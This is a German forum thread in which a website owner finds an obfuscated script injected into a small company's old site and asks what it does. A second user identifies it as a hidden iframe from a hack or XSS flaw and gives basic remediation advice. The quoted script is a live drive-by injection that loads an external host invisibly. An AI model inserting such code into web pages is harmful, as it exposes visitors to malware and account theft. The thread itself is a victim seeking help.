Unbekanntes Script

[wskinner]

Hallo

Ich weiß nicht ob ich mit meinem Anliegen hier richtig bin.

Ich hab auf einer Website die ich mal vor langer Zeit erstellt habe, einen Zugriff festgestellt, den ich mir nicht erklären kann.
Ich habe den aktuellen HTML-Code mit dem vom bekannten letzten Zugriff verglichen. Dabei habe ich festgestellt, dass folgender Quelltext zugefügt wurde

<script>var html_ifr_ff="\x3ci\x66ra\x6de s\x72c=\'\u0068t\u0074p://bbs\x67\u0065r\u006d\x61ny.co.tv\x2fi\u006e\x2ecgi\x3f3\' \167i\u0064th\u003d\061\u003024 h\x65\151ght=7\x368 s\x74\171l\x65=\"\x64i\163p\x6cay:none;\"\u003e</iframe>";document.write(html_ifr_ff);</script>

Kann mir jemand sagen was das soll? Soweit reicht meine Kenntnis leider nicht.

Vielen Dank im Voraus.

 

[struppi]

Deine Seite wurde gehackt oder deine Software hat eine XSS Lücke.

Der Code bindet ein unsichtbares iframe ein, der Server wurde aber bereits abgeschaltet. Trotzdem würde ich Passwörter ändern und mal nachschauen was für eine Software auf deinem Server läuft und ob das jeweils die aktuellen Versionen sind.

 

[wskinner]

Hallo Erstmal vielen Dank für die schnelle Antwort.

Ich habe die Internetseite abgeschaltet. Vorerst.Kannst du mir den Link aus dem Code extrahieren?Welchen Sinn oder Zweck könnte das haben?

Seltsam ist dabei noch folgendes. Diese Internetseite, die gehackt wurde, gehört einen kleinem Unternehmen. Seit dem letzten illigalem Zugriff via ftp auf die Homepage wurde von zwei Banken auch das Onlinebanking gesperrt, als Mitarbeiter versuchten von den Office-PCs Überweisungen zu tätigen.

Mittlerweile hab ich auch einen Virus gefunden.

Wie kann ich feststellen, ob eine XSS Sicherheitslücke vorliegt?Besten Dank Vorweg</p>

 

[struppi]

Den Code entschlüsseln kannst du in dem du um das script-Tag eine textarea legst.

Zum Rest kann ich dir wenig sagen, ich bin kein Sicherheitsexperte. Aber ob deine Anwendung XSS Anfällig ist, kannst du daran feststellen ob eine Eingabe nach HTML Code gefiltert wird oder nicht.